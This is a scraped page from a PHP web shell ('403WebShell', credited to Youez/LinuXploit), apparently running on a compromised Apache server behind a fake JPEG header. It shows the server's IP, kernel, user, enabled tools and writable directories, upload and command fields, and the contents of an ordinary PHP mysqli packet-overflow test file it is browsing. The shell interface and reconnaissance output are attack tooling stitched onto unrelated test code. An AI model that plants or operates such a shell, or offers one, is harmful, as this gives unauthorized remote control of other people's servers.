????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.128.173.223
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/home/b8009/php-5.6.22/ext/mysqli/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /proc/self/root/home/b8009/php-5.6.22/ext/mysqli/tests/mysqli_insert_packet_overflow.phpt
--TEST--
INSERT and packet overflow
--SKIPIF--
<?php
require_once('skipif.inc');
require_once('skipifconnectfailure.inc');

if (!$link = my_mysqli_connect($host, $user, $passwd, $db, $port, $socket))
	die(sprintf("SKIP [%d] %s\n", mysqli_connect_errno(), mysqli_connect_error()));

$max_len = pow(2, 24);
if (!$res = mysqli_query($link, "SHOW GLOBAL VARIABLES LIKE 'max_allowed_packet'"))
	die(sprintf("SKIP [%d] %s\n", mysqli_errno($link), mysqli_error($link)));

if (!mysqli_query($link, "SET NAMES 'latin1'"))
	die(sprintf("SKIP [%d] %s\n", mysqli_errno($link), mysqli_error($link)));

mysqli_close($link);
?>
--INI--
memory_limit=256M
--FILE--
<?php
	require('connect.inc');
	if (!$link = my_mysqli_connect($host, $user, $passwd, $db, $port, $socket))
		printf("[001] [%d] %s\n", mysqli_connect_errno(), mysqli_connect_error());

	if (!$res = mysqli_query($link, "SHOW GLOBAL VARIABLES LIKE 'max_allowed_packet'"))
		printf("[002] [%d] %s\n", mysqli_errno($link), mysqli_error($link));

	if (!$row = mysqli_fetch_assoc($res))
		printf("[003] [%d] %s\n", mysqli_errno($link), mysqli_error($link));

	mysqli_free_result($res);

	if (0 === ($org_max_allowed_packet = (int)$row['Value']))
		printf("[004] Cannot determine max_allowed_packet size and/or bogus max_allowed_packet setting used.\n");

	$max_len = pow(2, 24);
	if ($org_max_allowed_packet < $max_len) {
		if (!mysqli_query($link, "SET GLOBAL max_allowed_packet = " . ($max_len + 100))) {
			if (1227 == mysqli_errno($link)) {
				/* [1227] Access denied; you need the SUPER privilege for this operation */
				print "done!";
				exit(0);
			} else {
				printf("[005] [%d] %s\n", mysqli_errno($link), mysqli_error($link));
			}
		}
	}
	mysqli_close($link);
	if (!$link = my_mysqli_connect($host, $user, $passwd, $db, $port, $socket))
		printf("[006] [%d] %s\n", mysqli_connect_errno(), mysqli_connect_error());

	if (!mysqli_query($link, "SET NAMES 'latin1'"))
		printf("[007] [%d] %s\n", mysqli_connect_errno(), mysqli_connect_error());

	if (!$res = mysqli_query($link, "SHOW GLOBAL VARIABLES LIKE 'max_allowed_packet'"))
		printf("[008] [%d] %s\n", mysqli_errno($link), mysqli_error($link));

	if (!$row = mysqli_fetch_assoc($res))
		printf("[009] [%d] %s\n", mysqli_errno($link), mysqli_error($link));

	mysqli_free_result($res);

	if (0 === ($max_allowed_packet = (int)$row['Value']))
		printf("[010] Cannot determine max_allowed_packet size and/or bogus max_allowed_packet setting used.\n");

	$max_len = pow(2, 24);
	if ($max_allowed_packet < $max_len) {
		printf("[011] Failed to change max_allowed_packet");
	}

	if (!mysqli_query($link, "CREATE TABLE test(col_blob LONGBLOB) ENGINE=" . $engine))
		printf("[012] [%d] %s\n", mysqli_errno($link), mysqli_error($link));

	$query_prefix = "INSERT INTO test(col_blob) VALUES ('";
	$query_postfix = "')";
	$query_len = strlen($query_prefix) + strlen($query_postfix);
	$com_query_len = 2;


	$blob = str_repeat('a', $max_len - $com_query_len - $query_len);
	$query = sprintf("%s%s%s", $query_prefix, $blob, $query_postfix);

	if (!mysqli_query($link, $query))
		printf("[013] max_allowed_packet = %d, strlen(query) = %d, [%d] %s\n", $max_allowed_packet, strlen($query), mysqli_errno($link), mysqli_error($link));

	if (!$res = mysqli_query($link, "SELECT col_blob FROM test"))
		printf("[014] [%d] %s\n", mysqli_errno($link), mysqli_error($link));

	if (!$row = mysqli_fetch_assoc($res)) {
		printf("[015] [%d] %s\n", mysqli_errno($link), mysqli_error($link));
	} else {
		if ($row['col_blob'] != $blob) {
			printf("[016] Blob seems wrong, dumping data\n");
			var_dump(strlen($row['col_blob']));
			var_dump(strlen($blob));
		}
		mysqli_free_result($res);
	}

	if (!mysqli_query($link, "SET GLOBAL max_allowed_packet = " . $org_max_allowed_packet))
		if (1227 != mysqli_errno($link))
			printf("[017] [%d] %s\n", mysqli_errno($link), mysqli_error($link));

	mysqli_close($link);

	print "done!";
?>
--CLEAN--
<?php
	require_once("clean_table.inc");
?>
--EXPECTF--
done!

Youez - 2016 - github.com/yon3zu
LinuXploit